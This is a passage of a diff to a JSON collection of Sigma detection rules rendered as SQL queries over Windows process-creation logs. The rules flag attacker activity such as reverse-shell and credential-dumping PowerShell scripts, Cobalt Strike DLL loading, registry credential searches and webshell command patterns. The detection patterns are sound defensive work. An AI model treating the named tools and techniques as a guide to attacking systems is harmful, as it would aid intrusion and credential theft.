(CommandLine LIKE '%inject.ps1%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CVE%' ESCAPE '\\' OR CommandLine LIKE '%pupy.ps1%' ESCAPE '\\' OR CommandLine LIKE '%payload.ps1%' ESCAPE '\\' OR CommandLine LIKE '%beacon.ps1%' ESCAPE '\\' OR CommandLine LIKE '%PowerView.ps1%' ESCAPE '\\' OR CommandLine LIKE '%bypass.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfuscated.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfusc.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfus.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfs.ps1%' ESCAPE '\\' OR CommandLine LIKE '%evil.ps1%' ESCAPE '\\' OR CommandLine LIKE '%MiniDogz.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\_enc.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\shell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\rshell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%revshell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\av.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\av\\_test.ps1%' ESCAPE '\\' OR CommandLine LIKE '%adrecon.ps1%' ESCAPE '\\' OR CommandLine LIKE '%mimikatz.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PowerUp\\_%' ESCAPE '\\' OR CommandLine LIKE '%powerup.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\a.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\p.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\1.ps1%' ESCAPE '\\' OR CommandLine LIKE '%Hound.ps1%' ESCAPE '\\' OR CommandLine LIKE '%encode.ps1%' ESCAPE '\\' OR CommandLine LIKE '%powercat.ps1%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'HH.exe' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\') AND CommandLine LIKE '%.chm%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_progname.yml" + "filename": "proc_creation_win_hh_chm_execution.yml" }, { - "title": "Potential Conti Ransomware Database Dumping Activity", - "id": "2f47f1fd-0901-466e-a770-3b7092834a1b", + "title": "CobaltStrike Load by Rundll32", + "id": "ae9c6a7c-9521-42a6-915e-5aaa8689d529", "status": "test", - "description": "Detects a command used by conti to dump database", - "author": "frack113", + "description": "Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line.", + "author": "Wojciech Lesicki", "tags": [ - "attack.collection", - "attack.t1005" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sqlcmd.exe' ESCAPE '\\' OR (CommandLine LIKE '%sqlcmd %' ESCAPE '\\' OR CommandLine LIKE '%sqlcmd.exe%' ESCAPE '\\')) AND CommandLine LIKE '% -S localhost %' ESCAPE '\\' AND (CommandLine LIKE '%sys.sysprocesses%' ESCAPE '\\' OR CommandLine LIKE '%master.dbo.sysdatabases%' ESCAPE '\\' OR CommandLine LIKE '%BACKUP DATABASE%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR (CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' OR CommandLine LIKE '%rundll32 %' ESCAPE '\\')) AND (CommandLine LIKE '%.dll%' ESCAPE '\\' AND (CommandLine LIKE '% StartW' ESCAPE '\\' OR CommandLine LIKE '%,StartW' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_conti_ransomware_database_dump.yml" + "filename": "proc_creation_win_hktl_cobaltstrike_load_by_rundll32.yml" }, { - "title": "PUA - NSudo Execution", - "id": "771d1eb5-9587-4568-95fb-9ec44153a012", - "status": "experimental", - "description": "Detects the use of NSudo tool for command execution", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", + "title": "DNS RCE CVE-2020-1350", + "id": "b5281f31-f9cc-4d0d-95d0-45b91c45b487", + "status": "test", + "description": "Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by the detection of suspicious sub process", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.initial_access", + "attack.t1190", "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.t1569.002" ], "falsepositives": [ - "Legitimate use by administrators" + "Unknown but benign sub processes of the Windows DNS service dns.exe" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\NSudo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\NSudoLC.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\NSudoLG.exe' ESCAPE '\\') OR OriginalFileName IN ('NSudo.exe', 'NSudoLC.exe', 'NSudoLG.exe')) AND (CommandLine LIKE '%-U:S %' ESCAPE '\\' OR CommandLine LIKE '%-U:T %' ESCAPE '\\' OR CommandLine LIKE '%-U:E %' ESCAPE '\\' OR CommandLine LIKE '%-P:E %' ESCAPE '\\' OR CommandLine LIKE '%-M:S %' ESCAPE '\\' OR CommandLine LIKE '%-M:H %' ESCAPE '\\' OR CommandLine LIKE '%-U=S %' ESCAPE '\\' OR CommandLine LIKE '%-U=T %' ESCAPE '\\' OR CommandLine LIKE '%-U=E %' ESCAPE '\\' OR CommandLine LIKE '%-P=E %' ESCAPE '\\' OR CommandLine LIKE '%-M=S %' ESCAPE '\\' OR CommandLine LIKE '%-M=H %' ESCAPE '\\' OR CommandLine LIKE '%-ShowWindowMode:Hide%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\System32\\\\dns.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\System32\\\\werfault.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\System32\\\\conhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\System32\\\\dnscmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\System32\\\\dns.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_nsudo.yml" + "filename": "proc_creation_win_exploit_cve_2020_1350.yml" }, { - "title": "DLL Sideloading by Microsoft Defender", - "id": "7002aa10-b8d4-47ae-b5ba-51ab07e228b9", - "status": "experimental", - "description": "Detects execution of Microsoft Defender's CLI process (MpCmdRun.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", - "author": "Bhabesh Raj", + "title": "Enumeration for Credentials in Registry", + "id": "e0b0c2ab-3d52-46d9-8cb7-049dc775fbd1", + "status": "test", + "description": "Adversaries may search the Registry on compromised systems for insecurely stored credentials.\nThe Windows Registry stores configuration information that can be used by the system or other programs.\nAdversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.credential_access", + "attack.t1552.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\winsxs\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MpCmdRun.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' AND CommandLine LIKE '% query %' ESCAPE '\\' AND CommandLine LIKE '%/t %' ESCAPE '\\' AND CommandLine LIKE '%REG\\_SZ%' ESCAPE '\\' AND CommandLine LIKE '%/s%' ESCAPE '\\') AND ((CommandLine LIKE '%/f %' ESCAPE '\\' AND CommandLine LIKE '%HKLM%' ESCAPE '\\') OR (CommandLine LIKE '%/f %' ESCAPE '\\' AND CommandLine LIKE '%HKCU%' ESCAPE '\\') OR CommandLine LIKE '%HKCU\\\\Software\\\\SimonTatham\\\\PuTTY\\\\Sessions%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mpcmdrun_dll_sideload_defender.yml" + "filename": "proc_creation_win_reg_enumeration_for_credentials_in_registry.yml" }, { - "title": "Suspicious Electron Application Child Processes", - "id": "f26eb764-fd89-464b-85e2-dc4a8e6e77b8", + "title": "Remote CHM File Download/Execution Via HH.EXE", + "id": "f57c58b3-ee69-4ef5-9041-455bf39aaa89", "status": "experimental", - "description": "Detects suspicious child processes of electron apps (teams, discord, slack...).\nThis could be a potential sign of \".asar\" file tampering (See reference section for more information)\n", + "description": "Detects the usage of \"hh.exe\" to execute/download remotely hosted \".chm\" files.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.t1218.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\Teams.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\slack.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\discord.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%\\\\Discord.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\NVSMI\\\\nvidia-smi.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'HH.exe' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_electron_app_children.yml" + "filename": "proc_creation_win_hh_chm_remote_download_or_execution.yml" }, { - "title": "New Root Certificate Installed Via Certutil.EXE", - "id": "d2125259-ddea-4c1c-9c22-977eb5b29cf0", - "status": "test", - "description": "Detects execution of \"certutil\" with the \"addstore\" flag in order to install a new certificate on the system.\nAdversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.\n", - "author": "oscd.community, @redcanary, Zach Stanford @svch0st", + "title": "Local Groups Reconnaissance Via Wmic.EXE", + "id": "164eda96-11b2-430b-85ff-6a265c15bf32", + "status": "experimental", + "description": "Detects the execution of \"wmic\" with the \"group\" flag.\nAdversaries may attempt to find local system groups and permission settings.\nThe knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1553.004" + "attack.discovery", + "attack.t1069.001" ], "falsepositives": [ - "Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP" + "Unknown" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%/addstore%' ESCAPE '\\' OR CommandLine LIKE '%-addstore%' ESCAPE '\\') AND CommandLine LIKE '%root%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '% group%' ESCAPE '\\')" ], - "filename": "proc_creation_win_certutil_certificate_installation.yml" + "filename": "proc_creation_win_wmic_recon_group.yml" }, { - "title": "Suspicious Minimized MSEdge Start", - "id": "94771a71-ba41-4b6e-a757-b531372eaab6", + "title": "Visual Studio NodejsTools PressAnyKey Renamed Execution", + "id": "65c3ca2c-525f-4ced-968e-246a713d164f", "status": "test", - "description": "Detects the suspicious minimized start of MsEdge browser, which can be used to download files from the Internet", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects renamed execution of \"Microsoft.NodejsTools.PressAnyKey.exe\", which can be abused as a LOLBIN to execute arbitrary binaries", + "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.execution", + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Software that uses MsEdge to download components in the background (see ParentImage, ParentCommandLine)" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%start /min msedge%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'Microsoft.NodejsTools.PressAnyKey.exe' AND NOT ((NewProcessName LIKE '%\\\\Microsoft.NodejsTools.PressAnyKey.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_browsers_msedge_minimized_download.yml" + "filename": "proc_creation_win_renamed_pressanykey.yml" }, { - "title": "Suspicious Atbroker Execution", - "id": "f24bcaea-0cd1-11eb-adc1-0242ac120002", - "status": "test", - "description": "Atbroker executing non-deafualt Assistive Technology applications", - "author": "Mateusz Wydra, oscd.community", + "title": "PsExec/PAExec Escalation to LOCAL SYSTEM", + "id": "8834e2f7-6b4b-4f09-8906-d2276470ee23", + "status": "experimental", + "description": "Detects suspicious commandline flags used by PsExec and PAExec to escalate a command line to LOCAL_SYSTEM rights", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.resource_development", + "attack.t1587.001" ], "falsepositives": [ - "Legitimate, non-default assistive technology applications execution" + "Admins that use PsExec or PAExec to escalate to the SYSTEM account for maintenance purposes (rare)", + "Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%AtBroker.exe' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%animations%' ESCAPE '\\' OR CommandLine LIKE '%audiodescription%' ESCAPE '\\' OR CommandLine LIKE '%caretbrowsing%' ESCAPE '\\' OR CommandLine LIKE '%caretwidth%' ESCAPE '\\' OR CommandLine LIKE '%colorfiltering%' ESCAPE '\\' OR CommandLine LIKE '%cursorscheme%' ESCAPE '\\' OR CommandLine LIKE '%filterkeys%' ESCAPE '\\' OR CommandLine LIKE '%focusborderheight%' ESCAPE '\\' OR CommandLine LIKE '%focusborderwidth%' ESCAPE '\\' OR CommandLine LIKE '%highcontrast%' ESCAPE '\\' OR CommandLine LIKE '%keyboardcues%' ESCAPE '\\' OR CommandLine LIKE '%keyboardpref%' ESCAPE '\\' OR CommandLine LIKE '%magnifierpane%' ESCAPE '\\' OR CommandLine LIKE '%messageduration%' ESCAPE '\\' OR CommandLine LIKE '%minimumhitradius%' ESCAPE '\\' OR CommandLine LIKE '%mousekeys%' ESCAPE '\\' OR CommandLine LIKE '%Narrator%' ESCAPE '\\' OR CommandLine LIKE '%osk%' ESCAPE '\\' OR CommandLine LIKE '%overlappedcontent%' ESCAPE '\\' OR CommandLine LIKE '%showsounds%' ESCAPE '\\' OR CommandLine LIKE '%soundsentry%' ESCAPE '\\' OR CommandLine LIKE '%stickykeys%' ESCAPE '\\' OR CommandLine LIKE '%togglekeys%' ESCAPE '\\' OR CommandLine LIKE '%windowarranging%' ESCAPE '\\' OR CommandLine LIKE '%windowtracking%' ESCAPE '\\' OR CommandLine LIKE '%windowtrackingtimeout%' ESCAPE '\\' OR CommandLine LIKE '%windowtrackingzorder%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i -s powershell%' ESCAPE '\\') AND (CommandLine LIKE '%psexec%' ESCAPE '\\' OR CommandLine LIKE '%paexec%' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_susp_atbroker.yml" + "filename": "proc_creation_win_sysinternals_psexec_paexec_escalate_system.yml" }, { - "title": "Rhadamanthys Stealer Module Launch Via Rundll32.EXE", - "id": "5cdbc2e8-86dd-43df-9a1a-200d4745fba5", + "title": "Suspicious TSCON Start as SYSTEM", + "id": "9847f263-4a81-424f-970c-875dab15b79b", "status": "experimental", - "description": "Detects the use of Rundll32 to launch an NSIS module that serves as the main stealer capability of Rhadamanthys infostealer, as observed in reports and samples in early 2023", - "author": "TropChaud", + "description": "Detects a tscon.exe start as LOCAL SYSTEM", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'RUNDLL32.EXE' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\') AND CommandLine LIKE '%nsis\\_uns%' ESCAPE '\\' AND CommandLine LIKE '%PrintUIEntry%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\tscon.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_rhadamanthys_stealer_dll_launch.yml" + "filename": "proc_creation_win_tscon_localsystem.yml" }, { - "title": "DriverQuery.EXE Execution", - "id": "a20def93-0709-4eae-9bd2-31206e21e6b2", - "status": "experimental", - "description": "Detect usage of the \"driverquery\" utility. Which can be used to perform reconnaissance on installed drivers", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.discovery" - ], + "title": "Password Provided In Command Line Of Net.EXE", + "id": "d4498716-1d52-438f-8084-4a603157d131", + "status": "test", + "description": "Detects a when net.exe is called with a password in the command line", + "author": "Tim Shelton (HAWK.IO)", "falsepositives": [ - "Legitimate use by third party tools in order to investigate installed drivers" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%driverquery.exe' ESCAPE '\\' OR OriginalFileName = 'drvqry.exe'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '% use %' ESCAPE '\\' AND CommandLine LIKE '%:%\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%/USER:% %' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% ' ESCAPE '\\')))" ], - "filename": "proc_creation_win_driverquery_usage.yml" + "filename": "proc_creation_win_net_use_password_plaintext.yml" }, { - "title": "HackTool - Htran/NATBypass Execution", - "id": "f5e3b62f-e577-4e59-931e-0a15b2b94e1e", - "status": "experimental", - "description": "Detects exeuctable names or flags used by Htran or Htran-like tools (e.g. NATBypass)", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential CommandLine Path Traversal Via Cmd.EXE", + "id": "087790e3-3287-436c-bccf-cbd0184a7db1", + "status": "test", + "description": "Detects potential path traversal attempt via cmd.exe. Could indicate possible command/argument confusion/hijacking", + "author": "xknow @xknow_infosec, Tim Shelton", "tags": [ - "attack.command_and_control", - "attack.t1090", - "attack.s0040" + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ - "Unknown" + "Java tools are known to produce false-positive when loading libraries" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\htran.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lcx.exe' ESCAPE '\\') OR (CommandLine LIKE '%.exe -tran %' ESCAPE '\\' OR CommandLine LIKE '%.exe -slave %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'cmd.exe') AND ((ParentCommandLine LIKE '%/c%' ESCAPE '\\' OR ParentCommandLine LIKE '%/k%' ESCAPE '\\' OR ParentCommandLine LIKE '%/r%' ESCAPE '\\') OR (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/k%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\')) AND (ParentCommandLine = '/../../' OR CommandLine LIKE '%/../../%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%\\\\Tasktop\\\\keycloak\\\\bin\\\\/../../jre\\\\bin\\\\java%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_htran_or_natbypass.yml" + "filename": "proc_creation_win_cmd_path_traversal.yml" }, { - "title": "Potential Recon Activity Using DriverQuery.EXE", - "id": "9fc3072c-dc8f-4bf7-b231-18950000fadd", + "title": "Use Icacls to Hide File to Everyone", + "id": "4ae81040-fc1c-4249-bfa3-938d260214d9", "status": "experimental", - "description": "Detect usage of the \"driverquery\" utility to perform reconnaissance on installed drivers", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect use of icacls to deny access for everyone in Users folder sometimes used to hide malicious files", + "author": "frack113", "tags": [ - "attack.discovery" + "attack.defense_evasion", + "attack.t1564.001" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%driverquery.exe' ESCAPE '\\' OR OriginalFileName = 'drvqry.exe') AND ((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'iCACLS.EXE' OR NewProcessName LIKE '%\\\\icacls.exe' ESCAPE '\\') AND (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%/deny%' ESCAPE '\\' AND CommandLine LIKE '%S-1-1-0:%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_driverquery_recon.yml" + "filename": "proc_creation_win_icacls_deny.yml" }, { - "title": "Powershell Inline Execution From A File", - "id": "ee218c12-627a-4d27-9e30-d6fb2fe22ed2", - "status": "experimental", - "description": "Detects inline execution of PowerShell code from a file", - "author": "frack113", + "title": "PUA - Mouse Lock Execution", + "id": "c9192ad9-75e5-43eb-8647-82a0a5b493e3", + "status": "test", + "description": "In Kaspersky's 2020 Incident Response Analyst Report they listed legitimate tool \"Mouse Lock\" as being used for both credential access and collection in security incidents.", + "author": "Cian Heasley", + "tags": [ + "attack.credential_access", + "attack.collection", + "attack.t1056.002" + ], "falsepositives": [ - "Unknown" + "Legitimate uses of Mouse Lock software" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%iex %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Expression %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Command %' ESCAPE '\\' OR CommandLine LIKE '%icm %' ESCAPE '\\') AND (CommandLine LIKE '%cat %' ESCAPE '\\' OR CommandLine LIKE '%get-content %' ESCAPE '\\' OR CommandLine LIKE '%type %' ESCAPE '\\') AND CommandLine LIKE '% -raw%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product LIKE '%Mouse Lock%' ESCAPE '\\' OR Company LIKE '%Misc314%' ESCAPE '\\' OR CommandLine LIKE '%Mouse Lock\\_%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_exec_data_file.yml" + "filename": "proc_creation_win_pua_mouselock_execution.yml" }, { - "title": "Renamed PsExec Service Execution", - "id": "51ae86a2-e2e1-4097-ad85-c46cb6851de4", + "title": "Chopper Webshell Process Pattern", + "id": "fa3c117a-bc0d-416e-a31b-0c0e80653efb", "status": "experimental", - "description": "Detects suspicious launch of a renamed version of the PSEXESVC service with, which is not often used by legitimate administrators", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects patterns found in process executions cause by China Chopper like tiny (ASPX) webshells", + "author": "Florian Roth (Nextron Systems), MSTI (query)", "tags": [ - "attack.execution" + "attack.persistence", + "attack.t1505.003", + "attack.t1018", + "attack.t1033", + "attack.t1087" ], "falsepositives": [ - "Legitimate administrative tasks" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'psexesvc.exe' AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\PSEXESVC.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\') AND (CommandLine LIKE '%&ipconfig&echo%' ESCAPE '\\' OR CommandLine LIKE '%&quser&echo%' ESCAPE '\\' OR CommandLine LIKE '%&whoami&echo%' ESCAPE '\\' OR CommandLine LIKE '%&c:&echo%' ESCAPE '\\' OR CommandLine LIKE '%&cd&echo%' ESCAPE '\\' OR CommandLine LIKE '%&dir&echo%' ESCAPE '\\' OR CommandLine LIKE '%&echo [E]%' ESCAPE '\\' OR CommandLine LIKE '%&echo [S]%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_sysinternals_psexec_service.yml" + "filename": "proc_creation_win_webshell_chopper.yml" }, { - "title": "Potential Execution of Sysinternals Tools", - "id": "7cccd811-7ae9-4ebe-9afd-cb5c406b824b", - "status": "experimental", - "description": "Detects command lines that contain the 'accepteula' flag which could be a sign of execution of one of the Sysinternals tools", - "author": "Markus Neis", + "title": "Files Added To An Archive Using Rar.EXE", + "id": "6f3e2987-db24-4c78-a860-b4f4095a7095", + "status": "test", + "description": "Detects usage of \"rar\" to add files to an archive for potential compression. An adversary may compress data (e.g. sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.", + "author": "Timur Zinniatullin, E.M. 